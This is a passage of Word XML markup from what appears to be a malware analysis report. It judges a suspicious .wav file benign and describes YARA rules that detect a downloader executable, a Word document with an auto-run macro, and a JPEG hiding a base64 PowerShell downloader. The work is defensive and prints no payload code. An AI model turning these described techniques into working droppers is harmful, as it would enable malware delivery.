            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i w:val="1"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">volt.wav</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> uncovered several indicators that are inconsistent with a legitimate audio file. Despite its `.wav` extension, Additionally, the file’s entropy is notably high (~7.97), suggesting that portions may be compressed, encrypted, or packed.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000018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Upon further inspection into possible Base64-encoding, using the same methods from testing frontpage.jpg, no embedded content matched known Base64-encoding patterns. It was also concluded that the BMP and JPEG header detections were false positives, as the offsets that the Yara rule is searching against are too broad for such short headers. </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000019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Given these findings, while volt.wav initially raised suspicion due to its anomalous MIME type and high entropy, deeper analysis revealed no evidence of embedded executable content or malicious behavior. The absence of valid Base64-encoded payloads – especially when tested using the same steganographic decoding methods applied to confirmed malware – strongly suggests that the file does not contain hidden commands or downloaders. These results indicate that </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="1"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">volt.wav, despite its unconventional structure, does not exhibit traits consistent with a malicious file and can be considered benign.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000019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pStyle w:val="Heading1"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_q07y40623q6w" w:id="30"/>
      <w:bookmarkEnd w:id="3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4">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_e5nplm5focp6" w:id="31"/>
      <w:bookmarkEnd w:id="31"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Custom YARA Rule: </w:t>
      </w:r>
      <w:hyperlink r:id="rId61">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">thugLyfe2.yar</w:t>
        </w:r>
      </w:hyperlink>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detect these suspicious files, </w:t>
      </w:r>
      <w:hyperlink r:id="rId62">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">thugLyfe2.yar</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has been created with custom rules to target the unique attributes of these files. File names have been excluded from the identification process because these file names can easily be changed and invalidate the condition. Similarly, hashes have been excluded from the identification process because they can become invalid if the slightest change occurs to the content of the file. There are three custom YARA rules in this file:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000196">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is_Downloader2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000197">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is_OfficeAutoOpen</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000198">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is_Base64</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000019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“is_Downloader2” is the rule that detects the file </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">image_downloader.exe</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. The file downloads the image file </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">frontpage.jpg</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> from a specific IP address. The first part of the rule checks for the image file name and the IP address of the server that the image is downloaded from. The file also contains a title string of “ImageDownloader/1.0”. The rule checks for this unique string, accounting for potential changes in the version number. The file is a PE file, so the second half of the rule checks for the standard PE header at the beginning of the file. Analysis of the file also determined that it contains an MP3 file header, so the rule checks for this header as well.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000019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“is_OfficeAutoOpen” is the rule that detects the file </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SecurityAdvisory.docm</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. The file is a Microsoft Word Document that contains a malicious macro made to run upon opening the file. Microsoft files are zipped collections of smaller files, so the first part of the rule checks the beginning of the file for the zip file header. When a macro is inserted into a file, specific files are created and added to the zipped collection, such as </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">vba.xml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vbaProject.bin.rels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vbaProject.bin</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. The second half of the rule checks to determine if the files are present. Due to the encryption of the file, it is difficult to use the command strings in the macro for the ruleset. There is a Yara</w:t>
      </w:r>
      <w:hyperlink r:id="rId63">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> zip module</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> that would allow for the compressed macro to be searched; however, it requires a built-from-source version of Yara, while this investigation has used a binary version of Yara.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000019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“is_Based64” is the rule that detects the file </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">frontpage.jpg</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. The file uses base64 to encode a malicious PowerShell command, which downloads a malicious batch file. The first part of the rule checks for the JPG file header and trailer. The second part of the rule checks for the PowerShell command, the IP address of the server from which the suspicious file is downloaded, and the local file path where the file is downloaded to.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000019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pStyle w:val="Heading1"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_q7n9xmwi2vcn" w:id="32"/>
      <w:bookmarkEnd w:id="3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1">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_xe03n9qr85jg" w:id="33"/>
      <w:bookmarkEnd w:id="33"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">False Positive Testing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A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validate the efficacy and accuracy of the custom YARA ruleset (thugLyfe2.yar), a false positive test was conducted against directories known to contain benign, non-malicious files. This process is crucial to ensure that the rules target specific malicious indicators without flagging legitimate system files.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_4pa55uqcylbn" w:id="34"/>
      <w:bookmarkEnd w:id="34"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Test Environment and Directories</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A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that our custom Yara ruleset is working as expected, we must test it out in a known-good directory. The directory we chose for this was C:\Program Files (x86) and C:\Windows. Since they provide us with plenty of non-malicious files to look over, it ensures that we have no false positives in our ruleset.  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A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line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId64">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">True Positive and False Positive Testing Video</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A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video, hyperlinked above, is a screen recording that walks through the testing of thugLyfe2.yar against a set of benign files.</w:t>
      </w:r>
    </w:p>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A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:before="360" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_e71g3oi2hq9o" w:id="35"/>
      <w:bookmarkEnd w:id="35"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Differences Between thugLyfe2.yar &amp; thugBehavior.yar</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001A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hyperlink r:id="rId65">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">thugLyfe2.yar</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file was designed to detect three specific malicious files uncovered during Thug Lyfe’s second campaign. In contrast, the </w:t>
      </w:r>
      <w:hyperlink r:id="rId66">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">thugBehavior.yar</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file was created to identify broader behavioral patterns observed across both campaigns. </w:t>
      </w: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7.3831775700935"/>
        <w:gridCol w:w="3868.411214953271"/>
        <w:gridCol w:w="4014.2056074766356"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="1477.3831775700935"/>
            <w:gridCol w:w="3868.411214953271"/>
            <w:gridCol w:w="4014.2056074766356"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>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AD">
            <w:pPr>
              <w:spacing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File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E">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId67">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:b w:val="1"/>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">thugLyfe2.yar</w:t>
              </w:r>
            </w:hyperlink>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F">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId68">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:b w:val="1"/>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">thugBehavior.yar</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="800" w:hRule="atLeast"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="100.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="100.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B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Rule Count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separate rules: </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B2">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="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88038"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">is_Downloader2</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B3">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="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88038"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">is_OfficeAutoOpen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B4">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="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88038"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">is_Based64</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comprehensive rule</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B6">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="720" w:hanging="360"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="188038"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="188038"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">ThugBehavioralChange</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="800" w:hRule="atLeast"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="100.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="100.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B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Detection Focus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Targets specific known malicious files or behaviors individually in the second Threat Lyfe campaign</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="100.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="100.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B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Detects broad malicious behaviors associated with general "Thug Lyfe" campaigns</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="800" w:hRule="atLeast"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="100.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="100.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B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File Types Detected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 Office macro documents, JPEG</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="100.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="100.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B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 OLE, JPG, BMP, PNG, ZIP — wider coverage of common file types</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="1085" w:hRule="atLeast"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="100.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="100.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001B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Indicators Used</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E">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8"/>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 strings (e.g., </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="188038"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">"ImageDownloader/"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88038"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">"Google"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F">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8"/>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File headers and trailers</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C0">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8"/>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IP</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C1">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8"/>
              </w:numPr>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Base64 encoded strings</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="100.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="100.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C2">
            <w:pPr>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Behavioral indicators (e.g., injection, persistence, execution)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C3">
            <w:pPr>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File types &lt;br&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001C4">
            <w:pPr>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IPv4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="1085" w:hRule="atLeast"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="100.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="100.0" w:type="dxa"/>
            </w:tcMar>
